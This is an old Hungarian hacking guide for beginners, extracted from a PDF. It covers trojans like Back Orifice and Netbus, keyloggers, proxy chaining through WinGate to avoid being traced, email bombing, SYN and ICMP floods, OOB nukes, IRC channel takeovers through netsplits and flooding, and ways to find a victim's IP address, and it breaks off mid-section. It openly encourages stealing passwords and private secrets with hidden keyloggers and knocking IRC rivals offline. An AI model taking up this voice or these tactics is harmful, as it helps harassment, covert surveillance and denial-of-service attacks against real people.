akarnak ismerkedni a fekete oldallal is; valamint azoknak, akik rejtelyes okokbol<br />
folyton elszallnak az IRC-n torteno beszelgetes kozben.(Vagy mindig kinyilik a CDajto<br />
;)<br />
Oke pupakok! Nezzuk milyen eszkozok allnak rendelkezesre a Windowshoz,<br />
melyekkel egy kis nem kivant mukodest lehet eloidezni a halozatban. Ezt az<br />
oprendszert meg mindig sokkal tobben hasznaljak, mint barmely mas operacios<br />
rendszert, ezert megeri kivul-belul jol megismerni, barmennyire is nem tetszik. Az<br />
igazi hacker mindenre kivancsi.<br />
I. Altalanos eszkozok<br />
II. D.o.S.<br />
III. IRC tudomany<br />
IV. Vegszo<br />
I. Általános eszközök<br />
Ide tartoznak: telnet, trojai programok, portscannerek, keyloggerek, firewall, email<br />
bombazok. Nezzuk mire jok ezek:<br />
1. Telnet<br />
A telnet arra hasznalhato, hogy egy masik gephez csatlakozva szoveges<br />
kommunikaciot folytassunk vele. Ehhez Start>Run>telnet parancsot kell kiadnunk. Pl. ha a mail.matav.hu szamitogephez akarsz<br />
csatlakozni, a 25-os porton, akkor ird be: telnet mail.matav.hu 25. Ha nem adsz meg<br />
portot, akkor alapertelmezettnek a 23-as portot veszi, amit ugy is neveznek, hogy<br />
telnet-port. Ha egy kicsit is tudsz angolul, nem okozhat gondot a telnet hasznalata.<br />
Egyik fontos beallitasa a local echo, amellyel azt adhatjuk meg, hogy az ablakba<br />
altalunk begepelt karaktereket megjelenitse-e a program. Ez azert lehet hasznos,<br />
mert van olyan szerver, amelyik a neki kuldott karaktereket visszakuldi, igy ketszer<br />
jelenik meg az ablakban es ez zavaro. Ha viszont kikapcsoljuk es a szerver nem<br />
kuldi vissza (ez az echo) akkor nem latjuk, mit irunk.<br />
77
Hackers’ Guide<br />
Egyebkent ha egy karaktert leutunk, azt a program azonnal el is kuldi. Ez majd<br />
kesobb fontos lehet.<br />
2. Portscannerek<br />
A portscanner arra jo, hogy egy masik szamitogep nyitott portjait megallapithassuk.<br />
Osszesen 65536 kulonbozo (TCP) portja lehet egy szamitogepnek, de ezek kozul<br />
csak nehany van nyitva. Nehany a nevezetes portok kozul: 25-mail port, ha nyitva<br />
van, akkor valoszinuleg mail-szerver uzemel a gepen; 80-www/http port, webszerver;<br />
21-ftp port; 23-telnet; 7-echo; 13-daytime; 139-netbios; stb. A nyitott portokon<br />
keresztul tudunk csak a gephez kapcsolodni.<br />
Sokfele kulonbozo portscannert lattam mar. A szolgaltatasok koze tartoznak:<br />
megadott IP-tartomany keresese, megadott port-tartomany keresese, loggolas, a<br />
megnyithato portokra beallithato uzenet kuldese, uzenet fogadasa, a szerver altal<br />
lecsukott portok "nyitvatartasi idejenek" merese, a portok megnyitasa kozotti ido<br />
beallithatosaga, stb.<br />
3. Trojai programok<br />
A ket legismertebb a BO (vagy Back Orifice, magyarul hatso nyilas) es a Netbus.<br />
Masok is leirtak mar, mik is ezek, de nem hagyhatom ki oket a felsorolasbol. A trojai<br />
programok olyan programok, melyek ket reszbol allnak: a szerver- es a<br />
kliensprogrambol. Ha a szerverprogramot felinstallalod az egyik gepre, akkor a<br />
klienssel vezerelni tudod azt, es kulonbozo dolgokat tudsz vegrehajtani. Eleg oreg<br />
dolgok mar ezek (tobb mint egy evesek), es habar a hacker-filozofiaval nem<br />
ellenkezik a hasznalatuk, egyesek berzenkednek tole, tul egyszeru oket hasznalni.<br />
Hasznalatuk azert kulonbozo problemakat felvet. Pl. a celgepre valahogy fel kell<br />
installalni a szervert, s ha nincs fizikai hozzaferesed, eleg nehez ugy. Pl. az IRC-n<br />
raveheted, hogy vegye at toled es inditsa el. (Ezt nem taglalom, szerintem nagyon<br />
gyerekes dolog. Akit ra tudsz venni, az annyira buta, hogy inkabb meg kellene<br />
vedeni, nem szivatni.) Nezzuk mit tudnak ezek.<br />
BO - a Cult of the Dead Cow (CdC) termeke. Csak Win9x-en mukodik. Legismertebb<br />
valtozata az 1.20. Kodolt UDP csomagokkal kommunikal, ami osszekottetes-mentes<br />
kommunikaciot jelent. Lehetove teszi a kliensnek a celgep regisztracios<br />
adatbazisanak modositasat, amivel eleg sok mindent vegre tud hajtani. Ki tudja<br />
fejteni a gepen tarolt jelszavakat, pl. a kepernyokimeloet vagy az Internet-eleres<br />
jelszavat. Keplopasra is kepes, bar nem annyira ugyesen, mint a Netbus.<br />
Billentyuzet-figyelest is vegre tud hajtani, valamint kilistazza a futo alkalmazasokat,<br />
merevlemez tartalmat, fileok torlese, mozgatasa, megtekintese, beepitett webszerver,<br />
alkalmazasok leallitasa, inditasa, TCP-n keresztul file-ok fogadasa, kuldese,<br />
sysinfo lekerdezes, gep lefagyasztasa, ujrabootolas az alapszolgaltatasok. Ezeken<br />
kivul kulonfele pluginek leteznek hozza, amelyekkel meg erdekesebb dolgokat lehet<br />
csinalni: hozzakapcsolni a szervert egy masik exe-filehoz, mint egy virust; egy masik<br />
plugin e-mailt kuld a megadott cimre, ha a szamitogep fellep az Internetre, leirja a<br />
gep IP-cimet, stb.<br />
Netbus - tud egypar dolgot, amit a BO, nem mindet, de vannak dolgok, amit a BO<br />
nem tud. Termeszetesen mindketto ugy reklamozza magat, mint "remoteadministering<br />
tool", azaz tav-adminisztracios eszkoz, de a BO inkabb a hackerek<br />
kezebe valo, mig a Netbus szorakozasra. Ilyen pl. a CD-ajto nyitogatasa, az eger<br />
vezerlese, egergombok felcserelese, gombok letiltasa... de azert jol hasznalhato<br />
78
Hackers’ Guide<br />
egyeb piszkos dolgokra is. Sok valtozata terjedt el, 1.53, 1.6, es a leggyakoribb az<br />
1.7. Nemreg jott ki a 2.0, de az mar nem rejti el magat, mert kihagytak belole egy par<br />
lehetoseget, hogy ne lehessen vele visszaelni. Persze ehhez is jelent mar meg crack<br />
... :) Egyebkent TCP-kapcsolatot hoz letre, es WinNT alatt is fut.<br />
Kulonben a legtobb viruskereso felismeri mar oket. Kulon felismero programokat is<br />
konnyen lehet talalni a neten, amelyek eltavolitjak oket. De kezileg is felismerhetok:<br />
inditsd el: Start>Run>regedit, majd<br />
HKEY_LOCAL_MACHINE>SOFTWARE>Microsoft>Windows>Currentversion>Run,<br />
vagy RunServices. Itt nezd vegig a programokat, ezeket inditja el a Windows<br />
indulaskor. Ha talalsz valami gyanusat, szedd ki es kesz. (Jobb gomb>Delete.)<br />
Kulonben se tul jo ha ismeretlen dolgok tanyaznak itt. Persze itt csak ovatosan<br />
turkalj, ha valami gyanusat talalsz, elobb nezd meg a haverodnal, neki megvan-e!<br />
4. Keylogger<br />
A keylogger magyarul billentyuzetfigyelo. Jegyzi a leutott billentyuket es eltarolja oket<br />
egy fileba. A Netbusban olyan beepitett billentyuzetfigyelo van, amelyik egybol at is<br />
kuldi a kliensnek a leutott billentyuket. A jobbak azonban eltaroljak az Alt, Ctrl, Shift,<br />
Backspace, Del, F1-F12, Esc stb. karaktereket is, kesobb sokkal jobban fel lehet<br />
hasznalni a logfilet. Lattam olyat is, amelyik a programok inditasat es a kilepeseket is<br />
figyelte es rogzitette. Ezek mar tulmennek az egyszeru billentyuzetfigyeles hataran.<br />
Nos, a billentyuzetfigyelok hasznalata akkor erdekes, ha fizikai hozzaferesed van<br />
(lehetoleg rendszeresen) a celgephez, es masokkal kozosen hasznalod. Jelszavakat,<br />
maganeleti titkokat lophatsz vele. Erdemes olyat valasztani, amelyik kussban fut<br />
(nem eszlelheto), mar sok ilyen van.<br />
5. Firewall<br />
Magyarul tuzfal. Egy olyan program, amellyel a halozati forgalmat tudod figyelni es<br />
kontrollalni. Jo vedelmet jelent, ha egy tuzfal moge bujsz, mert nem tudjak<br />
letapogatni a nyitott portjaidat, ha nem akarod; vagy nem tudnak hozzaferni az<br />
esetlegesen a gepeden futo BO-hoz vagy Netbushoz vagy egyeb trojai programhoz.<br />
Ezek a programok akkor erdekesek, ha pl. modemmel csatlakozol az Internethez,<br />
tehat kozotted es az Internet kozott nincs masik szamitogep. (Pl. nem egy<br />
alhalozaton vagy. Az alhalozatok eseteben csak az egyik gep van az Internetre<br />
kotve, a tobbi ehhez csatlakozik, igy ennek kell a tuzfal szerepet ellatni, hogy az<br />
egesz halozatot megvedje.)<br />
6. WinGate szerverek<br />
A WinGate szerverek relative ismeretlenek a magyar mezei hackereknek. Vagy<br />
ugyesen titkoljak, mindenesetre nem nagyon reklamozzak. A WinGate szerver olyan<br />
szerver, melynek segitsegevel IP cimunket elrejthetjuk, lenyomozhatatlanna tehetjuk.<br />
Ugy kell elkepzelni, hogy ha egy masik szamitogephez akarsz csatlakozni, akkor<br />
kozbeiktatsz egy masik szamitogepet (WinGate szerver) amelynek mindossze<br />
kozvetito szerepe van, de firewallkent is mukodik. (Igen, igen! Aki ezek utan nem jon<br />
ra magatol, mire jo a WinGate, az most azonnal hagyja abba az olvasast, az soha<br />
nem lesz hacker!) Szoval egy igazi nagy durranas. Nezzuk, hogyan kell hasznalni:<br />
Tegyuk fel, hogy a WinGate szerver neve ttt.wingate.com, portja 23 (ez altalanos). A<br />
fenti peldanal maradva, a mail.matav.hu 25-os portjara akarunk csatlakozni. Vegyuk<br />
79
Hackers’ Guide<br />
elo ismet a telnetet:<br />
telnet ttt.wingate.com<br />
A kovetkezo sztringet kapjuk:<br />
WinGate><br />
A WinGate szerverek egyebkent visszaechoznak, tehat a local echot ki kell<br />
kapcsolni. Irjuk be:<br />
mail.matav.hu:25<br />
Es WHALAA! csatlakoztunk a mail.matav.hu 25-os portjara, de meg ha loggoljak is<br />
az IP-t, akkor is azt latjak majd, hogy ttt.wingate.com.<br />
Na persze, vannak egyes WinGate szerverek, amelyek szinten rogzitik a csatlakozok<br />
IP cimeit, de amig kapcsolatba lepnek veluk, visszanyomoznak teged, addig eltelik<br />
egy par nap/het, valamint: "fuzz ossze tobb WinGate szervert egymas utan" es mar<br />
nem is eri meg a faradsagot visszanyomozni teged. Pfff! Egyebkent WinGate szerver<br />
listaert nezz korul a neten, mert allandoan valtozik. (Marmint a lista.)<br />
7. E-mail bombazok<br />
Ezekkel a programokkal inkabb bosszanto mint veszedelmes eredmenyt tudsz elerni,<br />
azonban a torvenyek ezt is tiltjak. Arra szolgalnak, hogy nevtelenul rengeteg<br />
mocskolodo levellel elaraszd a celpont levelesladajat, igy teletoltve egyreszt nem tud<br />
ujat fogadni, masreszt eltart egy darabig, mig letolti oket, majd letorli oket. Hatrany,<br />
hogy nem tudod az arcat figyelni, amikor megpillantja, mennyi levele jott.<br />
Mindenesetre elegtetelt vehetsz. Probald ki az Avalanche es Kaboom legujabb<br />
verzioit. Az Avalanche, nekem ugy tunt tobbet tud: gyorsabbnak mondja magat,<br />
valamint van benne egy sereg opcio.: WinGate hasznalat, hibauzenettel torteno<br />
bombazas, beepitett sertegeto (persze angol), es egy sereg tipp, amelyek jol jonnek<br />
ha letoltod.<br />
II. D.o.S.<br />
A D.o.S. nem a BillGatez-fele fenomenalis oprendszer, hanem a Denial of Service<br />
angol szavak roviditese. A DoS olyan tevekenyseg, melynek soran/eredmenyekepp<br />
egy bizonyos szolgaltatas szinvonala csokken vagy a szolgaltatas megszunik.<br />
Megvilagitom. Tegyuk fel, hogy van egy webszerver (valahol a vilagban, mindegy.)<br />
Ezen egy DoS tamadast vegrehajtva jo esetben a szolgaltatas lelassul, nehezen<br />
elerhetove valnak az oldalak, vagy egyaltalan nem valaszol majd a szerver, esetleg<br />
lefagy, vagy ujraindul.<br />
Most haromfele DoS tamadast fogok ismertetni: a SYN floodot, az ICMP floodot es<br />
az OOB Nuke-t.<br />
SYN flood (forditva/feldolgozva a "SYN Floods and SYN Cookies - The cause and<br />
cure" cimu NeonSurge/Rhino9 irasbol): ez a fajta tamadas a TCP-kapcsolat<br />
felepitesenek serulekenysegen alapul. Mielott belemegyunk, elotte elmagyarazom,<br />
hogyan is mukodik a TCP.<br />
1. A kliens (aki kapcsolatot akar teremteni a masik geppel) kerelmet kuld a<br />
celgepnek, megadva a portot, amelyhez csatlakozni akar.<br />
2. A szerver visszakuldi a kerelem nyugtazasat, valamint lefoglalja a memoriajaban a<br />
kapcsolathoz szukseges adatteruletet.<br />
80
Hackers’ Guide<br />
3. A kliens nyugtazza a szerver valaszat es ezzel a kapcsolat letrejott, lehet TCPcsomagokat<br />
kuldozgetni mindket iranyban.<br />
Kicsit bovebben:<br />
1. A kliens egy SYN (synchronize) kerelmet kuld a szervernek, egy ISNnel (initial<br />
sequence number) egyutt. Az ISNbol rakja sorrendbe az operacios rendszer az<br />
erkezo TCP-csomagokat (a csomagok ugyanis nem biztos, hogy sorrendben<br />
erkeznek, el is veszhetnek utkozben, megduplazodhatnak). Az ISN az alcazott<br />
tamadasok eseteben is fontos szerepet jatszik.<br />
2. A szerver megkapja a SYN-t, es valaszol egy SYN-nel, egy ISN-nel es egy<br />
nyugtazassal (ACK).<br />
3. A kliens nyugtazza (ACK) a szerver valaszt.<br />
A SYN flood lenyege, hogy a kliens az elso lepest vegrehajtja, de a harmadikat mar<br />
nem. Ezaltal a szerver soha nem kap nyugtazast a valaszara, tehat varakozni kezd.<br />
Egy bizonyos ido utan torli a kapcsolatot es felszabaditja a memoriat. Azonban, ha<br />
rovid ido alatt eleg sok kerelem erkezik, a port hasznalhatatlanna valik Optimalis<br />
esetben le is fagyhat.<br />
Abban az esetben, ha a szerver is egy egyszeru szamitogep, mondjuk egy mezei<br />
IRC-felhasznalo, a SYN-floodnak nem sok jelentosege van. De pl. ha ftp- vagy<br />
webszerver fut rajta, meg lehet akadalyozni, hogy mas felhasznalok is tudjanak<br />
kapcsolodni hozza. A port mindaddig hasznalhatatlan marad, amig SYN-kerelmek<br />
erkeznek. Meg nem volt alkalmam kiprobalni, de egyszer majd erdemes lenne, hogy<br />
vegre lehet-e hajtani egy ilyen tamadast valamelyik IRC-szerver 6667-es portjan<br />
(persze gondolom eleg sokan kell csinalni, hogy megalljon a rendszer :).<br />
A tamadast lehet konnyeden alcazni is, azaz a szervernek ugy tuntetni fel a dolgot,<br />
mintha a csomagok mindig mas-mas IP cimrol erkeznenek. Igy nem nagyon lehet<br />
megallapitani, hogy ki volt a tettes. Mellesleg jegyzem meg, hogy ezzel az alcazott<br />
tamadassal tonkre lehet tenni egy tuzfalat is, ha a szerver memoriaja nem tul nagy...<br />
ICMP flood (nemely reszei a Chaos Inc. wnuke4.doc-bol valok): az IP-hez (Internet<br />
Protocol) kozeli szinten mukodik. Az ICMP az Internet Control Message Protocol<br />
angol szavak roviditese. Ez egy adminisztracios protokoll, amely szetkapcsolodott<br />
szamitogepeknek (is) szolgaltat jelenteseket. Az ICMP flood (vagy ICMP nuke)<br />
programok hamis jelentest keszitenek, es a naiv TCP/IP implementaciok azt hiszik,<br />
hogy a kapcsolatuk a celgeppel megszakadt. Ezeknek az ICMP csomagoknak<br />
kulonbozo fajtajuk van, mindegyik mas-mas szetkapcsolodast jelent. Ilyenek pl. a<br />
Protocol Unreachable, Port Unreachable, Network Unreachable, Host Unreachable,<br />
Source Route Failed stb. Az ICMP ECHO flood specialis abbol a szempontbol, hogy<br />
nem okoz szetkapcsolast, hanem valaszt var a celgeptol. Ha nagyon sok ilyen<br />
csomag erkezik, az lelassitja az Internet-kapcsolatot, mert egyreszt fogadja a valaszt,<br />
masreszt erre valaszol is. Ehhez hasonlit meg az UDP flood is, amely azonban a<br />
gyakorlatban mar nem hasznalhato.<br />
Ilyen programokat barki kereshet a neten. Nemcsak Windows szerverekre<br />
mukodnek, es hasznosnak bizonyulhatnak az IRC-haboruban. Egyebkent... ki tudja?<br />
A rombolast szolgalja mind.<br />
81
Hackers’ Guide<br />
OOB Nuke: a Windows-gepekre hatnak, es altalaban a 139-es, NETBIOS porton<br />
operalnak. Specialis csomagokat kuldenek erre a cimre, es ha a tamadas sikeres,<br />
elougrik a Halal Kek Kepernyoje :) ilyenkor az aldozatnak ujra kell inditania a<br />
szamitogepet, ha tovabb akar Internetezni. Nagyon elterjedtek, mert a Win95 és<br />
egyes Win95 OSR2 valtozatok nem voltak kepesek kivedeni. Amennyire en tudom, a<br />
Win98 mar nem reagal rajuk.<br />
III. IRC tudomány<br />
Az IRC eloremozditoja a magyar hackerek fejlodesenek. Szerintem az IRC azert jo<br />
terulet, mert: a) egybol latod munkad vegeredmenyet b) sokan tudnak teamben<br />
dolgozni c) csak az szamit, kinek van tobb esze, nem pedig a nyers testi ero.<br />
Mostanra, ha atolvastad az elso ket fejezetet, tisztaban vagy egy-ket dologgal. Ennek<br />
a fejezetnek az a celja, mikeppen vedd magad a virtualis kuzdoteren. Mert hogy<br />
vedeni kell magad, az nem is vitas. Termeszetesen a leghatekonyabb vedekezes a<br />
tamadas, ezert ezt sem hagyhatod ki a repertoarodbol. Azonban<br />
figyelmezteteskeppen: lehet, hogy az elejen, uj tudasod birtokaban feleslegesen is<br />
hasznalni fogod ezeket az eszkozoket, ami meg megbocsathato, foleg ha figyelembe<br />
vesszuk, hogy neha egy toled erosebb ellenfellel akadsz ossze aki majd helyretesz<br />
(pl. egy IRC operatorral). Ha nem IRCeltel meg, akkor ezt a fejezetet nyugodtan<br />
atugorhatod, mert nem fogod erteni a gyakorlati jelentoseget. Es meg egy jotanacs:<br />
tanulmanyozd at az RFC1459-et, amely minden IRC-hacker elso lepese kellene,<br />
hogy legyen (ebbol lehet leginkabb megerteni sok egyebbel egyutt, hogy miert is jott<br />
letre az IRC).<br />
1. Az IRC halozat szerkezete, netsplit, nick collision, K-Line<br />
2. Flood<br />
3. Wingate><br />
1. Az IRC halozat szerkezete, netsplit, nick collision, K-Line<br />
Az IRC szerverek fa-strukturaban csatlakoznak egymashoz. Ez azt jelenti, hogy zart<br />
lanc sehol nem johet letre. Ha megis letrejonne valahol, akkor ott azonnal szet is<br />
kapcsol ket szerver. (Ez reszletesen le van irva az RFC1459-ben.) Minden kliens<br />
csatlakozik egy szerverhez, es ha uzenetet kuldenek, az vegigvandorol az egesz fan<br />
a szervereken, amig mindenki meg nem kapja, akinek az uzenet szolt. Minden<br />
szerver egyidoben ugyanazt kell, hogy lassa egy IRC-halozaton. Ha valtozas<br />
tortenik, az a szervereken vegighullamozva mindenutt ervenyesitesre jut (pl. ha egy<br />
kliens bejelentkezik valahova, azt az osszes szervernek tudnia kell); ezert nem lehet<br />
zart lanc sehol, hiszen akkor egy szerver ketszer is megkapna egy-egy uzenetet. Ha<br />
tul nagy az adatforgalom ket szerver kozott, akkor a szerverek elvalnak (ez tortenhet<br />
mas okbol is, de ez a legegyszerubb). Ez a netsplit. Ilyenkor az IRC halozat<br />
ketteosztodik, ket fastrukturaju halozat jon letre. Ilyenkor az osszes csatorna is<br />
kettevalik: azok a kliensek, akik a fa elso reszenek valamelyik szervererol jottek be,<br />
csak azokkal a kliensekkel fognak tudni kommunikalni, amelyek szinten azon a<br />
reszen jottek be, mig a masik fa kliensei csak a sajat halozatuk klienseivel. Ilyenkor<br />
minden csatornan az oppal rendelkezok kozul is csak azok fognak megmaradni, akik<br />
a sajat halozaton vannak. Jelenleg a netsplit utan a szerverek 20 percig taroljak a<br />
nick adatokat, azaz 20 percig nem lehet olyan nickre valtani, amelyik a netsplit elott<br />
hasznalatban volt es a masik oldalon maradt. De 20 perc utan mar valaszthatsz<br />
82
Hackers’ Guide<br />
olyan nicket is, amelyik a masik oldalon ragadt, es ennek jelentosege akkor<br />
jelentkezik, mikor a szerverek ujbol osszekapcsolodnak. Ilyenkor a szerverek<br />
kicserelik az informacioikat es egyesitik az azonos nevu csatornakat: aki barmelyik<br />
oldalon op volt, az ezutan is op lesz, aki nem, az nem. Ha a ket oldalon azonos nevu<br />
klienseket talalnak, akkor mind a ketto kapcsolatat megszuntetik a szerverek. (Ez a<br />
nick collision.)<br />
Kezded kapisgalni? Tetelezzuk fel a kovetkezo viszonylag egyszeru esetet: egy<br />
csatornan ket op van, mondjuk mindketto bot. Legyen az egyik @Peti, a masik<br />
@Pali. Tetelezzuk fel, hogy mindketto az irc.elte.hu -rol jott be. Rajtuk kivul meg<br />
Gergely van a csatin, es el akarja foglalni, mert o a hacker. O az irc.webbernet.net -<br />
rol van. Keletkezik egy netsplit, Gergelynek opja lesz a masik oldalon, mivel ott<br />
egyedul van. Meg ket klienset behoz a masik oldalon, arra a halozatra, amelyiken o<br />
is van, Peti es Pali neven. Persze ehhez 20 percet kell varnia, es szerencse kell<br />
ahhoz, hogy ezalatt ne egyesuljon a ket oldal. Miutan mindez megvan, nem kell mast<br />
tennie, mint varni az egyesulesre es ahh! Az osszes Peti es Pali kihal, csak o marad<br />
a csatornan, mint op.<br />
A netsplitek es netjoinok figyelesere lepj be a &servers csatornara, vagy pl. a<br />
Dalneten a +s flaget allitsd be. (Az IRCNeten nem ismerik a flaget.)<br />
A K-Line (szerverban) pedig azt jelenti, hogy egy adott szerverrol nem engednek be<br />
bizonyos IP-cimekrol klienseket. Ezt IRC operatorok tudjak elrendelni (akik, mint<br />
tudjuk, nem ugyanazok, mint a csatornaoperatorok). A szerver nem rendeltetesszeru<br />
hasznalata eseten kaphatunk ilyet, pl. klonok bevitele, folyamatos veg nelkuli<br />
floodolas, csatornak hivatasszeru elfoglalasa, fake username hasznalata, botok<br />
futtatasa, ha tilos stb. Ilyenkor az IRCop donti el, hogy pl a *.dial.matav.hu-et<br />
bannolja, vagy a *.matav.hu-t, vagy esetleg a *.hu-t :)<br />
2. Flood<br />
Nos, ez egyertelmuen tamadofegyver, barmilyen tipusrol is legyen szo. Egy par<br />
lehetoseget mar megvizsgaltunk a II.fejezetben. Az IRC-n leggyakoribb az ICMP<br />
flood, a programokban a szerver helyere azt az IRC szervert ird be, amelyikrol az<br />
ellenfeled bejott, a kliens helyere az o IP-cimet, szerverportok: altalaban 6667-6669,<br />
de ez szerverenkent eltero lehet. A kliensportok pedig altalaban: 1024-1400. A<br />
leghatekonyabb Unreach tipusnak a Protocol Unreachable bizonyult. Most nezzuk<br />
milyen mas eszkozok vannak meg masokat floodolni:<br />
Nickflood: gyorsan valtoztatod a nickedet. Ez ellen nem lehet vedekezni, csak ha<br />
kirugnak a csatornarol. Altalaban is ervenyes, hogy ezeket az eszkozoket csak ott<br />
tudod hatekonyan felhasznalni, ahol nem all fenn ennek a veszelye. A nickflood ellen<br />
nem lehet ignore-val vedekezni, mert a nickvaltasrol szolo uzeneteket mindenkeppen<br />
megkapja minden kliens a szervertol, amelyik a csatornan van.<br />
Topicflood: gyorsan valtoztatod a topicot. Szinten nem lehet vedekezni ellene. Csak<br />
akkor mukodik, ha jogod van a topicot valtoztatni.<br />
Join/Part: gyorsan kilepsz-belepsz a csatornarol/ra. Ezeket az uzeneteket is<br />
megkapja mindenki a csatornan. Ezeken a modokon minden csatornan levo<br />
szemelyt floodolsz.<br />
CTCP flood: nehany IRC kliens implementalja (alkalmazza) a CTCP-t (Client To<br />
Client Protocol). Hasznalata: /ctcp . A tipus lehet: CLIENTINFO,<br />
VERSION, TIME, DCC, USERINFO, FINGER, PING. Hatasara a tipustol fuggoen<br />
83
Hackers’ Guide<br />
mindig egy bizonyos informaciot kapunk a klienstol, pl. milyen verzioju<br />
kliensprogramot hasznal, mennyi nala az ido, valamint a PING- re megkapjuk a<br />
kliens es a kozottunk levo idot, amelyet az uzeneteknek meg kell tenniuk. Ha valakit<br />
CTCP flooddal tamadsz meg, a kliense ugyanolyan gyorsan uzeneteket kuld neked<br />
vissza, de ha szerencsed van, az IRC szerver kiteszi a szuret. Persze a kliensben ki<br />
is lehet kapcsolni a CTCP-t.<br />
Msgflood: privat uzenetek gyors kuldese. Akkor a leghatekonyabb, ha az illetonek<br />
olyan szkriptje van, amely automatikusan valaszol az uzenetekre. Vagy esetleg bot<br />
ellen, ha rosszul van konfiguralva, es nem korlatozza a sajat uzeneteinek<br />
gyorsasagat.<br />
Channelflood: ez a leggagyibb. Egyszeruen rengeteg szemettel arasztod el a<br />
csatornat, igy elvezhetetlen lesz a beszelgetes, optimalis esetben a lassubb<br />
kapcsolattal rendelkezok kiesnek. No persze:<br />
A leghatekonyabb, ha tobben csinaljatok a floodolast, minel tobben, annal jobb.<br />
Irhatsz szkriptet is ra, de jobb megoldasnak tunik, ha programot hasznalsz ra,<br />
amelyik sok klonnal tud egyszerre floodolni. Igy ha ki is esik egyik-masik klon, ujra<br />
tud csatlakozni.<br />
Megjegyzes: Nuke/ICMP flooder programot nem adok el, nem cserelek es nem<br />
vasarolok. Ajandekba se adok.<br />
3. WinGate><br />
Mar tudjuk, mi az a WinGate, nezzuk, hogyan lehet IRC-zesre hasznalni. Legyen a<br />
WinGate a ttt.wingate.com, 23-as port, az irc szerver pedig mondjuk az<br />
irc.wingated.com, 6667-es port.<br />
Inditsuk el az IRC klienst, es irjuk be a statusba:<br />
/server ttt.wingate.com:23<br />
most egy WinGate> promptot kapunk, majd egy csomo szemetet, mert a kliens<br />
automatikusan elkuldi a NICK es USER uzeneteket (ugye elolvastad az RFC1459et?)<br />
mIRC-ben:<br />
/raw irc.wingate.com:6667<br />
kapjuk, hogy connected, mire beirjuk:<br />
/raw NICK Wizard<br />
/raw USER Magic Fairie hacker@wingate.com :Hacker<br />
PIRCH-ben:<br />
/quote irc.wingate.com:6667<br />
megintcsak connected, ha minden jol megy, es akkor beirjuk:<br />
/quote NICK Wizard<br />
/quote USER Magic Fairie hacker@wingate.com :Hacker<br />
Es ha beenged a szerver, akkor kezdhetsz IRC-elni, es barki lekerdezi az IP-det, azt<br />
fogja latni, hogy a ttt.wingate.com-rol jottel be ;) Es valoban onnan is jottel, nem<br />
igaz? Van egy kis bokkeno. Nem tudok magyar WinGate szervert, es a magyar<br />
szerverek nem fogadnak el amerikai csatlakozast. Ez az egyik. Masik: sok szerveren<br />
K-Linera teszik a WinGate szervereket. Gondolj bele: egy IP-rol max. harom<br />
csatlakozast fogadnak el, igy megduplazhatod ezt, vagy akar meg is sokszorozhatod.<br />
Hogy nez ma az ki hogy valaki 15 peldanyban van fent? (Jol nez ki, de az IRCopok<br />
szerint nem :) Az elso problema a nagyobb, mert a magyar szervereken meg nem<br />
lattam WinGate-t K-Linen csak kulonfele sulinetes(!) szervereket.<br />
84
IV. Végszó<br />
Hackers’ Guide<br />
Eredetileg ide valami utbaindito konnyes szoveget akartunk irni, de aztan rajottunk,<br />
hogy egy igazi hacker ugyis rajon, mit kell tennie, hogy ne kapjak el, a tobbi meg<br />
inkabb bukjon le! :) Ugyhogy inkabb csak az elerhetosegunket irjuk ide:<br />
IRCNet, qocok es Voyager2 nick, mindig mashol, de altalaban az #eurohack<br />
csatornán. A csatorna pontos nevét lásd ahttp://hackers.freeshell.orgoldalon.<br />
E-mail:qocok@geocities.comésvoyager2@freemail.hu<br />
Vegezetul: nehogy azt gondold, hogy ez minden! Ez az alap! Es nehol annyira<br />
kozerthetoen fogalmaztunk, hogy az mar a szakszeruseg rovasara ment!<br />
************************************************************************************************<br />
Az IP szerzés módszerei<br />
Essünk túl az IP fogalmán. IP (Internet Protocol) : 1 hálózati rétegprotokoll, amely a<br />
gazdaszámítógépek között továbbítja az adatokat. Ez azonban nem teljesen pontos,<br />
mert a felhasználók többsége azt hiszi, de még az Internettel foglalkozó irodalom<br />
jelentős része is az IP-címeket a gazda számítógépekkel hozzák kapcsolatba. Tudni<br />
kell azonban, hogy az Interneten lévő számítógép valójában nem rendelkezik IP<br />
címmel. az IP-cím a számítógépben lévő Ethernet interfészkártya is lehet, ezek<br />
mind1ike saját 1edi IP címmel rendelkezik. Az 1*-űség kedvéért általában az IPcímet<br />
a gazdagéphez kapcsoljuk, de ne felejtsük el, hogy, ténylegesen az<br />
interfészkártyáé (nem mindig gazda számítógépé) az IP-cím.<br />
Remélem érthető volt...<br />
Az IP szerzés módszerei (kezdőknek) :<br />
1. A balfasz : kérdezzük + tőle mi az ip-je. Ezt, pl. úgy tudjuk elérni, hogy felhívjuk rá<br />
az érdeklődését pl: tudtad, hogy minden gép kap belépéskor 1 IP-számot és te<br />
neked is van bla,bla,bla.(sokszor bejön)<br />
2.E-mail Írjunk neki 1 e-mailt mindenféle kamu szöveggel, a lényeg hogy jöjjön<br />
valami válasz rá. Ha megkaptuk a levelet, mentsük le. Így kapunk 1 eml kiterjesztésű<br />
filet. Ezután már csak meg kell néznünk 1 bármilyen 1*-ű wieverrel és máris +kapjuk<br />
1 csomó adatot, de nekünk most csak ez a pár a fontos pl:<br />
balfasz.matav.hu (d27-bp.matav.hu [145.236.158.78]) Így +van az IP is és sok<br />
esetben az is, hogy hol lakik az illető.<br />
Persze mint tudjátok elterjedtek az ingyenes e-mailszolgáltatók. Nincs gond.<br />
Legtöbbször a páciens valamilyen levelező prg-n át használja a szolgáltatást pl:<br />
outlook. Így ugyanazon a mail serveren jön át, tehát ugyanazokat az adatokat kapjuk<br />
+. A gond akkor van, ha az illető a Web felületről küldi a levelet, akkor ugyanis csak<br />
85
Hackers’ Guide<br />
ezt kapjuk meg a módszerral pl: (ns0.matav.hu [145.456.452.25]) ez lófasz sajnos<br />
semmit nem ér, ekkor obi van kenobi. Tehát ha te se akarod +szívni akkor mindig<br />
Webes felületről levelezz.<br />
3. Chat : A csetek nagyon jó támadópontok. Itt az ember nick (bece) neve mellé van<br />
írva az ip-je vagy a hostja. Sajnos már 1-re több cseten levették ezt. De pl: a Talk<br />
Café-n és még jó pár cseten azért van. Ahol nincs kiírva, ott sincs gond.<br />
Jöhet a javaban irt kis programok. (álltalába minden csethez másik kell)<br />
Térjünk vissza a hostra. Hostból IP. Nagyon 1*-ű alap módszer de mindig müxik a<br />
következő: hozzávalók: nyiss 1 dos ablakot, írd be, hogy tracert host pl: tracert d1bp.matav.hu<br />
és kész is.<br />
4, ICQ. Ez egy jó progi de nem biztonságos. Van az embernek 1 UINszáma. Na ezt<br />
